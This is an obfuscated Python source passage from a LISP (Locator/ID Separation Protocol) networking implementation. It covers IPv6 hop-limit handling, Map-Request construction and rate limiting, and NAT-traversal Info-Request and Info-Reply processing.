if 48 - 48: i1IIi % iIii1I11I1II1 + I1IiiI - OoOoOO00 % I11i . I1Ii111
if 66 - 66: I1Ii111 * i11iIiiIii + I1IiiI % II111iiii
def lisp_ipv6_input ( packet ) :
oO0o0 = packet . inner_dest
packet = packet . packet
if 47 - 47: II111iiii % o0oOOo0O0Ooo
if 26 - 26: I1ii11iIi11i / I11i / Oo0Ooo / i1IIi + O0 * ooOoO0o
if 53 - 53: IiII / II111iiii / oO0o % O0 / I1Ii111
if 91 - 91: oO0o * OoOoOO00 + O0 % Oo0Ooo
if 62 - 62: iIii1I11I1II1 - i11iIiiIii % iIii1I11I1II1 . ooOoO0o / OOooOOo * OoOoOO00
oo0o = struct . unpack ( "B" , packet [ 7 : 8 ] ) [ 0 ]
if ( oo0o == 0 ) :
dprint ( "IPv6 packet arrived with hop-limit 0, packet discarded" )
return ( None )
elif ( oo0o == 1 ) :
dprint ( "IPv6 packet {}, packet discarded" . format ( bold ( "ttl expiry" , False ) ) )
if 45 - 45: OOooOOo - OOooOOo % iII111i - IiII . O0
return ( None )
if 6 - 6: iIii1I11I1II1 * II111iiii / O0 % IiII - I1Ii111
if 64 - 64: ooOoO0o
if 28 - 28: i11iIiiIii - IiII * I1ii11iIi11i + IiII * iII111i
if 75 - 75: o0oOOo0O0Ooo * OoOoOO00 % I1ii11iIi11i + OOooOOo . II111iiii
if 12 - 12: ooOoO0o
if ( oO0o0 . is_ipv6_link_local ( ) ) :
dprint ( "Do not encapsulate IPv6 link-local packets" )
return ( None )
if 83 - 83: I1Ii111 % ooOoO0o + OoooooooOO
if 50 - 50: i11iIiiIii % I1IiiI * iII111i / Ii1I
oo0o -= 1
packet = packet [ 0 : 7 ] + struct . pack ( "B" , oo0o ) + packet [ 8 : : ]
return ( packet )
if 12 - 12: iII111i / OoO0O00 - II111iiii + Oo0Ooo
if 78 - 78: i1IIi
if 25 - 25: Ii1I * II111iiii / OoOoOO00
if 86 - 86: i1IIi + I1IiiI + I1Ii111 % II111iiii . IiII - iIii1I11I1II1
if 54 - 54: i11iIiiIii . Ii1I % I1IiiI . I1Ii111 . OoooooooOO
if 49 - 49: OOooOOo % I11i - OOooOOo + Ii1I . I1ii11iIi11i + ooOoO0o
if 15 - 15: i11iIiiIii
if 85 - 85: I1Ii111 + iII111i - oO0o
def lisp_mac_input ( packet ) :
return ( packet )
if 59 - 59: IiII . oO0o / i11iIiiIii . I1Ii111
if 64 - 64: OoOoOO00
if 20 - 20: OoOoOO00 / O0 * OOooOOo % I11i + OoO0O00 + o0oOOo0O0Ooo
if 51 - 51: Ii1I - OoOoOO00 / i11iIiiIii + O0
if 71 - 71: ooOoO0o
if 35 - 35: OoOoOO00
if 55 - 55: iII111i - o0oOOo0O0Ooo + IiII * II111iiii
if 6 - 6: I1Ii111 / i1IIi / IiII . o0oOOo0O0Ooo
if 69 - 69: ooOoO0o - OoOoOO00 . I1IiiI . I11i + OoOoOO00 / i11iIiiIii
def lisp_rate_limit_map_request ( source , dest ) :
if ( lisp_last_map_request_sent == None ) : return ( False )
OoooOOoOo = lisp_get_timestamp ( )
oO000o0Oo00 = OoooOOoOo - lisp_last_map_request_sent
ooOoOoooo = ( oO000o0Oo00 < LISP_MAP_REQUEST_RATE_LIMIT )
if 20 - 20: OoO0O00 . OoooooooOO - ooOoO0o . I11i / Oo0Ooo
if ( ooOoOoooo ) :
if ( source != None ) : source = source . print_address ( )
dest = dest . print_address ( )
dprint ( "Rate-limiting Map-Request for {} -> {}" . format ( source , dest ) )
if 89 - 89: iIii1I11I1II1 . ooOoO0o
return ( ooOoOoooo )
if 82 - 82: OoOoOO00 - II111iiii . OoO0O00 * ooOoO0o
if 78 - 78: OoOoOO00 % oO0o
if 39 - 39: iIii1I11I1II1
if 72 - 72: II111iiii + I1Ii111 / Ii1I * iIii1I11I1II1
if 95 - 95: OoooooooOO + OOooOOo + II111iiii + IiII + OoO0O00
if 86 - 86: II111iiii / iII111i - I1ii11iIi11i
if 65 - 65: I1ii11iIi11i + OoOoOO00
def lisp_send_map_request ( lisp_sockets , lisp_ephem_port , seid , deid , rloc ) :
global lisp_last_map_request_sent
if 43 - 43: O0 + I11i % II111iiii
if 56 - 56: IiII + Oo0Ooo . IiII % iIii1I11I1II1 % ooOoO0o % ooOoO0o
if 70 - 70: ooOoO0o / i1IIi - I11i - i11iIiiIii
if 79 - 79: OoO0O00 - OoooooooOO % iII111i . O0
if 93 - 93: I1Ii111
if 3 - 3: OoO0O00 / IiII - oO0o / oO0o
iiIiiI1 = oo0OooOOo0oO = None
if ( rloc ) :
iiIiiI1 = rloc . rloc
oo0OooOOo0oO = rloc . translated_port if lisp_i_am_rtr else LISP_DATA_PORT
if 48 - 48: O0
if 99 - 99: II111iiii * oO0o / I1ii11iIi11i - i1IIi
if 84 - 84: i11iIiiIii . OoooooooOO
if 69 - 69: I1Ii111 * II111iiii % I1Ii111 * i11iIiiIii . ooOoO0o / Oo0Ooo
if 5 - 5: Ii1I
iIIIIiiII , i1IiIii , OoO0o0OOOO = lisp_myrlocs
if ( iIIIIiiII == None ) :
lprint ( "Suppress sending Map-Request, IPv4 RLOC not found" )
return
if 77 - 77: OoooooooOO / II111iiii + Ii1I * o0oOOo0O0Ooo . i11iIiiIii
if ( i1IiIii == None and iiIiiI1 != None and iiIiiI1 . is_ipv6 ( ) ) :
lprint ( "Suppress sending Map-Request, IPv6 RLOC not found" )
return
if 24 - 24: I11i + OoO0O00
if 76 - 76: II111iiii - O0 / Oo0Ooo % OoOoOO00
o00oo00OOOO = lisp_map_request ( )
o00oo00OOOO . record_count = 1
o00oo00OOOO . nonce = lisp_get_control_nonce ( )
o00oo00OOOO . rloc_probe = ( iiIiiI1 != None )
if 1 - 1: I1ii11iIi11i / iIii1I11I1II1 . Oo0Ooo + I1IiiI / Oo0Ooo
if 62 - 62: oO0o * OoOoOO00 % iII111i * ooOoO0o . Oo0Ooo . i11iIiiIii
if 60 - 60: iIii1I11I1II1 + O0
if 96 - 96: iII111i . i1IIi % o0oOOo0O0Ooo * iIii1I11I1II1 - iII111i - OoooooooOO
if 13 - 13: i1IIi
if 68 - 68: I1ii11iIi11i . IiII + O0 % i1IIi + iIii1I11I1II1
if 17 - 17: i1IIi - OOooOOo * ooOoO0o + i1IIi - ooOoO0o + I1ii11iIi11i
if ( rloc ) : rloc . last_rloc_probe_nonce = o00oo00OOOO . nonce
if 28 - 28: iII111i
iiI1 = deid . is_multicast_address ( )
if ( iiI1 ) :
o00oo00OOOO . target_eid = seid
o00oo00OOOO . target_group = deid
else :
o00oo00OOOO . target_eid = deid
if 18 - 18: I1Ii111
if 29 - 29: i1IIi - I1IiiI / i1IIi
if 64 - 64: IiII
if 69 - 69: OOooOOo . I1IiiI
if 11 - 11: I1Ii111 * I1IiiI - I1Ii111 / iII111i
if 22 - 22: iII111i % I11i % O0 - I11i
if 71 - 71: I1Ii111 / II111iiii - OoooooooOO % i1IIi + OoOoOO00 % OoooooooOO
if 52 - 52: Ii1I . OoOoOO00 / o0oOOo0O0Ooo / iII111i
if 83 - 83: OoO0O00 - Oo0Ooo + I1Ii111 . I1IiiI
if ( o00oo00OOOO . rloc_probe == False ) :
Ooooo00 = lisp_get_signature_eid ( )
if ( Ooooo00 ) :
o00oo00OOOO . signature_eid . copy_address ( Ooooo00 . eid )
o00oo00OOOO . privkey_filename = "./lisp-sig.pem"
if 78 - 78: I11i / ooOoO0o . OoOoOO00 * i1IIi
if 15 - 15: i1IIi . II111iiii * OoOoOO00 / Oo0Ooo
if 99 - 99: iII111i - o0oOOo0O0Ooo / O0
if 97 - 97: iIii1I11I1II1 * I1Ii111
if 39 - 39: I1Ii111 . II111iiii
if 94 - 94: OoO0O00 - OoO0O00 + iIii1I11I1II1 + O0 * oO0o
if ( seid == None or iiI1 ) :
o00oo00OOOO . source_eid . afi = LISP_AFI_NONE
else :
o00oo00OOOO . source_eid = seid
if 9 - 9: Ii1I * Oo0Ooo / oO0o / Ii1I
if 34 - 34: I1IiiI
if 56 - 56: Ii1I
if 71 - 71: O0 / i1IIi
if 20 - 20: OOooOOo . iIii1I11I1II1 - I1Ii111 . i1IIi
if 82 - 82: oO0o * i11iIiiIii % o0oOOo0O0Ooo % IiII - I11i - OoO0O00
if 24 - 24: oO0o . II111iiii + OoO0O00 * I1ii11iIi11i / oO0o
if 86 - 86: I1Ii111 + I1ii11iIi11i
if 63 - 63: ooOoO0o - i11iIiiIii . o0oOOo0O0Ooo - i1IIi - IiII
if 32 - 32: I1Ii111 / iIii1I11I1II1 + oO0o % I11i * OoooooooOO
if 69 - 69: OOooOOo
if 9 - 9: i11iIiiIii * Oo0Ooo
if ( iiIiiI1 != None and lisp_nat_traversal and lisp_i_am_rtr == False ) :
if ( iiIiiI1 . is_private_address ( ) == False ) :
iIIIIiiII = lisp_get_any_translated_rloc ( )
if 33 - 33: oO0o / ooOoO0o
if ( iIIIIiiII == None ) :
lprint ( "Suppress sending Map-Request, translated RLOC not found" )
return
if 92 - 92: O0 . Oo0Ooo - Ii1I * I1IiiI * Oo0Ooo * iII111i
if 78 - 78: Ii1I * iIii1I11I1II1 - Ii1I - I1ii11iIi11i * I1ii11iIi11i
if 44 - 44: o0oOOo0O0Ooo
if 1 - 1: OoooooooOO / i11iIiiIii . o0oOOo0O0Ooo
if 78 - 78: OOooOOo * O0 * II111iiii % OoOoOO00
if 12 - 12: Oo0Ooo . o0oOOo0O0Ooo - i1IIi - oO0o % IiII . I11i
if 17 - 17: i1IIi % OoO0O00 + i11iIiiIii % I1Ii111 * ooOoO0o . I1ii11iIi11i
if 64 - 64: O0 - iII111i
if ( iiIiiI1 == None or iiIiiI1 . is_ipv4 ( ) ) :
if ( lisp_nat_traversal and iiIiiI1 == None ) :
oOoOO0oOo0O0O00 = lisp_get_any_translated_rloc ( )
if ( oOoOO0oOo0O0O00 != None ) : iIIIIiiII = oOoOO0oOo0O0O00
if 84 - 84: OOooOOo * ooOoO0o / O0
o00oo00OOOO . itr_rlocs . append ( iIIIIiiII )
if 96 - 96: I11i . I11i % II111iiii
if ( iiIiiI1 == None or iiIiiI1 . is_ipv6 ( ) ) :
if ( i1IiIii == None or i1IiIii . is_ipv6_link_local ( ) ) :
i1IiIii = None
else :
o00oo00OOOO . itr_rloc_count = 1 if ( iiIiiI1 == None ) else 0
o00oo00OOOO . itr_rlocs . append ( i1IiIii )
if 14 - 14: iII111i / OoooooooOO
if 8 - 8: OOooOOo + I1IiiI - Oo0Ooo + i1IIi . Ii1I . I1Ii111
if 38 - 38: I1IiiI / II111iiii * OoOoOO00 / I1Ii111
if 80 - 80: I1ii11iIi11i / ooOoO0o * ooOoO0o . Oo0Ooo
if 44 - 44: Ii1I * i1IIi % OoOoOO00 . OoOoOO00
if 16 - 16: Oo0Ooo / i1IIi / iIii1I11I1II1 / iIii1I11I1II1 % o0oOOo0O0Ooo / I1ii11iIi11i
if 11 - 11: I1IiiI
if 45 - 45: OOooOOo / i1IIi * IiII * I1Ii111
if 34 - 34: ooOoO0o / iIii1I11I1II1 . iII111i
if ( iiIiiI1 != None and o00oo00OOOO . itr_rlocs != [ ] ) :
oO00o0o0O = o00oo00OOOO . itr_rlocs [ 0 ]
else :
if ( deid . is_ipv4 ( ) ) :
oO00o0o0O = iIIIIiiII
elif ( deid . is_ipv6 ( ) ) :
oO00o0o0O = i1IiIii
else :
oO00o0o0O = iIIIIiiII
if 91 - 91: OoO0O00
if 8 - 8: oO0o
if 96 - 96: IiII
if 37 - 37: Ii1I % i11iIiiIii + iIii1I11I1II1 % Oo0Ooo - iIii1I11I1II1
if 26 - 26: o0oOOo0O0Ooo . i1IIi
if 62 - 62: IiII * I1ii11iIi11i % iIii1I11I1II1 / II111iiii - OoO0O00
IIii1i = o00oo00OOOO . encode ( iiIiiI1 , oo0OooOOo0oO )
o00oo00OOOO . print_map_request ( )
if 52 - 52: iII111i . I11i - I11i + oO0o + iIii1I11I1II1
if 83 - 83: I11i * iIii1I11I1II1 + OoOoOO00
if 81 - 81: ooOoO0o * OOooOOo / OoO0O00 + I1ii11iIi11i % I1Ii111
if 37 - 37: i11iIiiIii - OoooooooOO - OoOoOO00 * oO0o / Ii1I
if 100 - 100: II111iiii / Oo0Ooo / iII111i / OOooOOo
if 100 - 100: iIii1I11I1II1
if ( iiIiiI1 != None ) :
if ( rloc . is_rloc_translated ( ) ) :
O00OOoOOO0O0O = lisp_get_nat_info ( iiIiiI1 , rloc . rloc_name )
if 50 - 50: I1Ii111 / ooOoO0o * I11i
if 53 - 53: II111iiii . IiII
if 5 - 5: i1IIi % IiII
if 16 - 16: ooOoO0o - iII111i % Ii1I . OoOoOO00
if ( O00OOoOOO0O0O == None ) :
i11iII1IiI = rloc . rloc . print_address_no_iid ( )
i11ii = "gleaned-{}" . format ( i11iII1IiI )
III1I1Iii1 = rloc . translated_port
O00OOoOOO0O0O = lisp_nat_info ( i11iII1IiI , i11ii , III1I1Iii1 )
if 56 - 56: i11iIiiIii % i11iIiiIii % OoooooooOO . Ii1I . iII111i + I11i
lisp_encapsulate_rloc_probe ( lisp_sockets , iiIiiI1 , O00OOoOOO0O0O ,
IIii1i )
return
if 64 - 64: O0
if 37 - 37: o0oOOo0O0Ooo / O0
oo0o00OO = iiIiiI1 . print_address_no_iid ( )
oO0o0 = lisp_convert_4to6 ( oo0o00OO )
lisp_send ( lisp_sockets , oO0o0 , LISP_CTRL_PORT , IIii1i )
return
if 58 - 58: I1Ii111 + OoooooooOO + iIii1I11I1II1
if 13 - 13: o0oOOo0O0Ooo . I11i / O0
if 39 - 39: I11i + oO0o + ooOoO0o % ooOoO0o - I1IiiI % Oo0Ooo
if 9 - 9: IiII / iII111i * II111iiii + O0 % Oo0Ooo / i1IIi
if 45 - 45: OoOoOO00 % i11iIiiIii . I1IiiI - O0 * i1IIi - I1IiiI
if 48 - 48: IiII / iIii1I11I1II1
iIi1i = None if lisp_i_am_rtr else seid
if ( lisp_decent_pull_xtr_configured ( ) ) :
O0o00000o0O = lisp_get_decent_map_resolver ( deid )
else :
O0o00000o0O = lisp_get_map_resolver ( None , iIi1i )
if 5 - 5: OoOoOO00 . iIii1I11I1II1 + iII111i
if ( O0o00000o0O == None ) :
lprint ( "Cannot find Map-Resolver for source-EID {}" . format ( green ( seid . print_address ( ) , False ) ) )
if 63 - 63: i1IIi
return
if 24 - 24: i11iIiiIii % iII111i . oO0o
O0o00000o0O . last_used = lisp_get_timestamp ( )
O0o00000o0O . map_requests_sent += 1
if ( O0o00000o0O . last_nonce == 0 ) : O0o00000o0O . last_nonce = o00oo00OOOO . nonce
if 44 - 44: II111iiii - OoO0O00 + i11iIiiIii
if 34 - 34: I1ii11iIi11i % ooOoO0o / II111iiii * O0 % OOooOOo
if 9 - 9: I1ii11iIi11i / I1ii11iIi11i - OOooOOo . iIii1I11I1II1
if 33 - 33: I1IiiI + oO0o % I1IiiI / iII111i - ooOoO0o - i11iIiiIii
if ( seid == None ) : seid = oO00o0o0O
lisp_send_ecm ( lisp_sockets , IIii1i , seid , lisp_ephem_port , deid ,
O0o00000o0O . map_resolver )
if 39 - 39: i11iIiiIii / oO0o
if 71 - 71: I1Ii111 * iIii1I11I1II1 - I1Ii111
if 87 - 87: I1IiiI / Ii1I
if 54 - 54: OoooooooOO / Ii1I
lisp_last_map_request_sent = lisp_get_timestamp ( )
if 26 - 26: o0oOOo0O0Ooo + OoO0O00
if 59 - 59: Ii1I * IiII
if 64 - 64: ooOoO0o . Oo0Ooo - OoOoOO00
if 66 - 66: OoOoOO00
O0o00000o0O . resolve_dns_name ( )
return
if 83 - 83: OOooOOo . IiII
if 98 - 98: i11iIiiIii
if 74 - 74: iIii1I11I1II1 * O0 + OOooOOo . o0oOOo0O0Ooo
if 17 - 17: I1Ii111
if 59 - 59: OoOoOO00 . OoOoOO00 * iII111i - Ii1I . i11iIiiIii
if 68 - 68: iII111i
if 68 - 68: I1Ii111 - OoO0O00 % OoO0O00 % OOooOOo - OoO0O00
if 3 - 3: iIii1I11I1II1 + iIii1I11I1II1 + OoO0O00
def lisp_send_info_request ( lisp_sockets , dest , port , device_name ) :
if 59 - 59: iII111i
if 7 - 7: o0oOOo0O0Ooo * OoooooooOO - Ii1I * II111iiii % I1Ii111
if 82 - 82: OoOoOO00 - OoOoOO00 + iIii1I11I1II1 + o0oOOo0O0Ooo + IiII - o0oOOo0O0Ooo
if 65 - 65: I1Ii111 + OOooOOo
OO0O0OOooo = lisp_info ( )
OO0O0OOooo . nonce = lisp_get_control_nonce ( )
if ( device_name ) : OO0O0OOooo . hostname += "-" + device_name
if 19 - 19: ooOoO0o
oo0o00OO = dest . print_address_no_iid ( )
if 53 - 53: O0 - ooOoO0o * I11i - oO0o / i1IIi % Ii1I
if 100 - 100: i11iIiiIii / o0oOOo0O0Ooo
if 72 - 72: I1IiiI
if 90 - 90: ooOoO0o
if 67 - 67: iIii1I11I1II1 + i1IIi * I1IiiI * OoooooooOO
if 23 - 23: IiII
if 32 - 32: OoOoOO00 - iII111i % oO0o / I1ii11iIi11i - o0oOOo0O0Ooo
if 52 - 52: Ii1I / OoooooooOO % i11iIiiIii + iII111i
if 59 - 59: Ii1I / o0oOOo0O0Ooo / oO0o + iII111i * I1ii11iIi11i - o0oOOo0O0Ooo
if 70 - 70: O0 / I1ii11iIi11i + ooOoO0o . OoO0O00 - OoO0O00 / i11iIiiIii
if 1 - 1: iIii1I11I1II1 % I1ii11iIi11i
if 49 - 49: iII111i + o0oOOo0O0Ooo % I1ii11iIi11i . O0 % OoooooooOO . o0oOOo0O0Ooo
if 3 - 3: i11iIiiIii - i1IIi * o0oOOo0O0Ooo / OoOoOO00 % Oo0Ooo
if 65 - 65: OoooooooOO + iII111i - i11iIiiIii - IiII + oO0o
if 67 - 67: i1IIi * I1Ii111 * O0
if 16 - 16: OoO0O00 + iII111i + i1IIi + I1ii11iIi11i - I1IiiI
OOO0OOoo0o = False
if ( device_name ) :
OOo000oo = lisp_get_host_route_next_hop ( oo0o00OO )
if 91 - 91: I1ii11iIi11i % OoOoOO00
if 63 - 63: iIii1I11I1II1 + OoOoOO00 - I11i
if 10 - 10: I1ii11iIi11i
if 6 - 6: OoO0O00 + OoO0O00 * OOooOOo / IiII % ooOoO0o - I1IiiI
if 17 - 17: II111iiii
if 66 - 66: O0 % OoOoOO00 + IiII % I1Ii111
if 94 - 94: OoOoOO00 / OoooooooOO % Ii1I * i11iIiiIii
if 95 - 95: iIii1I11I1II1 % OOooOOo % O0
if 93 - 93: I1ii11iIi11i
if ( port == LISP_CTRL_PORT and OOo000oo != None ) :
while ( True ) :
time . sleep ( .01 )
OOo000oo = lisp_get_host_route_next_hop ( oo0o00OO )
if ( OOo000oo == None ) : break
if 61 - 61: o0oOOo0O0Ooo * ooOoO0o
if 82 - 82: O0 * O0 % I1IiiI / o0oOOo0O0Ooo
if 46 - 46: IiII . O0 . I11i % I1ii11iIi11i * oO0o - oO0o
ooooO0OO0 = lisp_get_default_route_next_hops ( )
for OoO0o0OOOO , iiIIII1I1ii in ooooO0OO0 :
if ( OoO0o0OOOO != device_name ) : continue
if 90 - 90: OoooooooOO . Oo0Ooo + IiII + I1IiiI * I1Ii111
if 82 - 82: OOooOOo / I11i % Ii1I * OoOoOO00
if 88 - 88: o0oOOo0O0Ooo % OoO0O00
if 30 - 30: II111iiii / Oo0Ooo % Oo0Ooo + O0 / iIii1I11I1II1 . OoO0O00
if 43 - 43: I1IiiI % OoOoOO00 * O0 + o0oOOo0O0Ooo
if 97 - 97: iIii1I11I1II1 + O0
if ( OOo000oo != iiIIII1I1ii ) :
if ( OOo000oo != None ) :
lisp_install_host_route ( oo0o00OO , OOo000oo , False )
if 41 - 41: OoOoOO00 - II111iiii
lisp_install_host_route ( oo0o00OO , iiIIII1I1ii , True )
OOO0OOoo0o = True
if 46 - 46: OOooOOo
break
if 73 - 73: iII111i - IiII + II111iiii
if 58 - 58: Oo0Ooo % I1IiiI
if 78 - 78: iII111i / iIii1I11I1II1 * IiII . ooOoO0o / I1Ii111 % I11i
if 14 - 14: II111iiii % iIii1I11I1II1 - I1IiiI % i11iIiiIii . OOooOOo * I1ii11iIi11i
if 12 - 12: I1ii11iIi11i % I1ii11iIi11i . OoO0O00 . OoOoOO00
if 73 - 73: I1ii11iIi11i * i1IIi * Oo0Ooo / O0
IIii1i = OO0O0OOooo . encode ( )
OO0O0OOooo . print_info ( )
if 1 - 1: iII111i * OOooOOo + II111iiii / Ii1I . I1ii11iIi11i
if 61 - 61: oO0o % OoOoOO00 % ooOoO0o . I1Ii111 / OoO0O00
if 21 - 21: IiII
if 15 - 15: OoOoOO00 % O0 - OOooOOo - oO0o . iII111i . OoO0O00
ooO0oO0o0O0o = "(for control)" if port == LISP_CTRL_PORT else "(for data)"
ooO0oO0o0O0o = bold ( ooO0oO0o0O0o , False )
III1I1Iii1 = bold ( "{}" . format ( port ) , False )
OO0o = red ( oo0o00OO , False )
ooOoOo0O = "RTR " if port == LISP_DATA_PORT else "MS "
lprint ( "Send Info-Request to {}{}, port {} {}" . format ( ooOoOo0O , OO0o , III1I1Iii1 , ooO0oO0o0O0o ) )
if 9 - 9: I11i + I1ii11iIi11i / I1IiiI + I1Ii111 % i1IIi / i1IIi
if 91 - 91: I11i
if 94 - 94: OoO0O00
if 19 - 19: I11i * i11iIiiIii - OoO0O00 / ooOoO0o * I1Ii111 + OoO0O00
if 30 - 30: Ii1I / iII111i * Ii1I
if 11 - 11: OoOoOO00 - OoOoOO00 % oO0o
if ( port == LISP_CTRL_PORT ) :
lisp_send ( lisp_sockets , dest , LISP_CTRL_PORT , IIii1i )
else :
Ii1I1i1IiiI = lisp_data_header ( )
Ii1I1i1IiiI . instance_id ( 0xffffff )
Ii1I1i1IiiI = Ii1I1i1IiiI . encode ( )
if ( Ii1I1i1IiiI ) :
IIii1i = Ii1I1i1IiiI + IIii1i
if 3 - 3: I1IiiI - OoooooooOO % iIii1I11I1II1 + I1Ii111 + OoOoOO00
if 71 - 71: i1IIi % O0 % ooOoO0o
if 24 - 24: O0
if 88 - 88: OoooooooOO / Oo0Ooo / oO0o
if 99 - 99: I1Ii111 % OoOoOO00 % IiII - Ii1I
if 79 - 79: ooOoO0o + Oo0Ooo
if 80 - 80: OoOoOO00 % OoO0O00 . OoO0O00 * OoO0O00 * O0
if 18 - 18: II111iiii . o0oOOo0O0Ooo + OoO0O00
if 69 - 69: OoO0O00 . ooOoO0o * ooOoO0o * iIii1I11I1II1
lisp_send ( lisp_sockets , dest , LISP_DATA_PORT , IIii1i )
if 8 - 8: iII111i . oO0o . OOooOOo + iII111i . Ii1I
if 46 - 46: OoO0O00
if 21 - 21: iIii1I11I1II1 - iII111i
if 15 - 15: O0 + iII111i + i11iIiiIii
if 31 - 31: iIii1I11I1II1 * iIii1I11I1II1 . I11i
if 52 - 52: i11iIiiIii / oO0o / IiII
if 84 - 84: I11i . oO0o + ooOoO0o
if ( OOO0OOoo0o ) :
lisp_install_host_route ( oo0o00OO , None , False )
if ( OOo000oo != None ) : lisp_install_host_route ( oo0o00OO , OOo000oo , True )
if 75 - 75: I1Ii111
return
if 97 - 97: ooOoO0o % Oo0Ooo . o0oOOo0O0Ooo
if 22 - 22: O0 % I11i + OoO0O00 - iII111i + I1IiiI . O0
if 73 - 73: ooOoO0o + O0 - I11i . I1IiiI + OOooOOo
if 36 - 36: I11i % OoO0O00 * OoOoOO00 - I1Ii111
if 16 - 16: ooOoO0o % OOooOOo . OoO0O00 % II111iiii . iIii1I11I1II1
if 21 - 21: oO0o + II111iiii / OoOoOO00 * I11i
if 90 - 90: OoOoOO00 % OoOoOO00 + I11i
def lisp_process_info_request ( lisp_sockets , packet , addr_str , sport , rtr_list ) :
if 70 - 70: I1IiiI . ooOoO0o / I11i / OoO0O00
if 40 - 40: oO0o % iIii1I11I1II1 * iIii1I11I1II1 / Oo0Ooo * OoO0O00
if 61 - 61: OOooOOo
if 80 - 80: I1ii11iIi11i
OO0O0OOooo = lisp_info ( )
packet = OO0O0OOooo . decode ( packet )
if ( packet == None ) : return
OO0O0OOooo . print_info ( )
if 6 - 6: I1ii11iIi11i + OOooOOo % ooOoO0o
if 65 - 65: iIii1I11I1II1 % i1IIi / I1IiiI / oO0o % ooOoO0o / I11i
if 2 - 2: I1ii11iIi11i
if 90 - 90: II111iiii * I1Ii111 . ooOoO0o - I1ii11iIi11i % I11i * o0oOOo0O0Ooo
if 85 - 85: iIii1I11I1II1
OO0O0OOooo . info_reply = True
OO0O0OOooo . global_etr_rloc . store_address ( addr_str )
OO0O0OOooo . etr_port = sport
if 76 - 76: i11iIiiIii % I1IiiI / I11i
if 42 - 42: o0oOOo0O0Ooo . I1IiiI + I11i . OoOoOO00 - O0 / Ii1I
if 66 - 66: IiII + OoOoOO00 + I1IiiI + i1IIi + OoooooooOO % I1IiiI
if 80 - 80: iII111i / O0 % OoooooooOO / Oo0Ooo
if 75 - 75: ooOoO0o
if ( OO0O0OOooo . hostname != None ) :
OO0O0OOooo . private_etr_rloc . afi = LISP_AFI_NAME
OO0O0OOooo . private_etr_rloc . store_address ( OO0O0OOooo . hostname )
if 72 - 72: oO0o . OoooooooOO % ooOoO0o % OoO0O00 * oO0o * OoO0O00
if 14 - 14: I11i / I11i
if ( rtr_list != None ) : OO0O0OOooo . rtr_list = rtr_list
packet = OO0O0OOooo . encode ( )
OO0O0OOooo . print_info ( )
if 90 - 90: O0 * OOooOOo / oO0o . Oo0Ooo * I11i
if 93 - 93: oO0o / ooOoO0o - I1Ii111
if 70 - 70: OOooOOo / Ii1I - ooOoO0o + OoooooooOO / OoO0O00 - i11iIiiIii
if 26 - 26: O0 + Oo0Ooo
if 30 - 30: IiII
lprint ( "Send Info-Reply to {}" . format ( red ( addr_str , False ) ) )
oO0o0 = lisp_convert_4to6 ( addr_str )
lisp_send ( lisp_sockets , oO0o0 , sport , packet )
if 6 - 6: O0
if 92 - 92: I11i
if 76 - 76: I11i / iIii1I11I1II1 - i11iIiiIii / O0 / O0
if 19 - 19: Ii1I . I1IiiI - i1IIi * ooOoO0o . iIii1I11I1II1
if 87 - 87: ooOoO0o % I1ii11iIi11i . I1IiiI
I11iiI1i11I = lisp_info_source ( OO0O0OOooo . hostname , addr_str , sport )
I11iiI1i11I . cache_address_for_info_source ( )
return
if 3 - 3: Oo0Ooo . IiII . Oo0Ooo
if 80 - 80: I1Ii111 + IiII + O0 - I1Ii111 . iIii1I11I1II1
if 53 - 53: OoO0O00 / i11iIiiIii * I1Ii111
if 62 - 62: oO0o / Oo0Ooo / IiII + I11i * ooOoO0o
if 84 - 84: ooOoO0o + OoOoOO00 * I1ii11iIi11i % OoooooooOO . O0
if 27 - 27: OoO0O00 * OoooooooOO - II111iiii / o0oOOo0O0Ooo
if 76 - 76: I11i % I1Ii111 % iII111i + IiII * iII111i + OoOoOO00
if 83 - 83: OOooOOo . ooOoO0o / IiII
def lisp_get_signature_eid ( ) :
for Ooooo00 in lisp_db_list :
if ( Ooooo00 . signature_eid ) : return ( Ooooo00 )
if 80 - 80: I1Ii111 . I11i - I11i + I1ii11iIi11i
return ( None )
if 42 - 42: I11i / IiII % O0 - Oo0Ooo
if 33 - 33: I1Ii111
if 1 - 1: IiII - iIii1I11I1II1 % OoooooooOO
if 1 - 1: o0oOOo0O0Ooo - i11iIiiIii + I11i
if 47 - 47: O0 + IiII + ooOoO0o + OOooOOo / OoOoOO00
if 31 - 31: oO0o * iII111i % OoOoOO00
if 80 - 80: ooOoO0o % I1ii11iIi11i % I11i . I1Ii111
if 3 - 3: ooOoO0o - Oo0Ooo
def lisp_get_any_translated_port ( ) :
for Ooooo00 in lisp_db_list :
for iIII in Ooooo00 . rloc_set :
if ( iIII . translated_rloc . is_null ( ) ) : continue
return ( iIII . translated_port )
if 2 - 2: iII111i . iII111i
if 77 - 77: OOooOOo
return ( None )
if 74 - 74: O0
if 86 - 86: OoOoOO00
if 4 - 4: OoooooooOO * OoO0O00
if 93 - 93: OoO0O00 - I1Ii111 - OoO0O00
if 1 - 1: o0oOOo0O0Ooo . oO0o * i11iIiiIii * IiII - OoO0O00 - OoooooooOO
if 29 - 29: iIii1I11I1II1 + OoO0O00 * II111iiii * Ii1I * iII111i . O0
if 6 - 6: I1IiiI - OoOoOO00
if 63 - 63: OOooOOo - oO0o * I1IiiI
if 60 - 60: II111iiii - Oo0Ooo
def lisp_get_any_translated_rloc ( ) :
for Ooooo00 in lisp_db_list :
for iIII in Ooooo00 . rloc_set :
if ( iIII . translated_rloc . is_null ( ) ) : continue
return ( iIII . translated_rloc )
if 43 - 43: I1IiiI - IiII - OOooOOo
if 19 - 19: I1Ii111 / I1Ii111 - i1IIi
return ( None )
if 99 - 99: O0
if 37 - 37: iIii1I11I1II1 / I1Ii111 + OoO0O00
if 85 - 85: ooOoO0o / I1IiiI
if 7 - 7: Oo0Ooo - iIii1I11I1II1 / I1ii11iIi11i * I1IiiI + Ii1I
if 99 - 99: i11iIiiIii - I1ii11iIi11i
if 64 - 64: IiII . OoOoOO00 . Oo0Ooo . I1Ii111 / I11i / Ii1I
if 95 - 95: iIii1I11I1II1 . Ii1I % oO0o - I11i % IiII
def lisp_get_all_translated_rlocs ( ) :
II1IIii = [ ]
for Ooooo00 in lisp_db_list :
for iIII in Ooooo00 . rloc_set :
if ( iIII . is_rloc_translated ( ) == False ) : continue
IiiIIi1 = iIII . translated_rloc . print_address_no_iid ( )
II1IIii . append ( IiiIIi1 )
if 25 - 25: Ii1I - Ii1I - I1ii11iIi11i / i1IIi . OoOoOO00 % Oo0Ooo
if 76 - 76: I1Ii111 / OoOoOO00
return ( II1IIii )
if 61 - 61: Oo0Ooo . i1IIi
if 78 - 78: i11iIiiIii
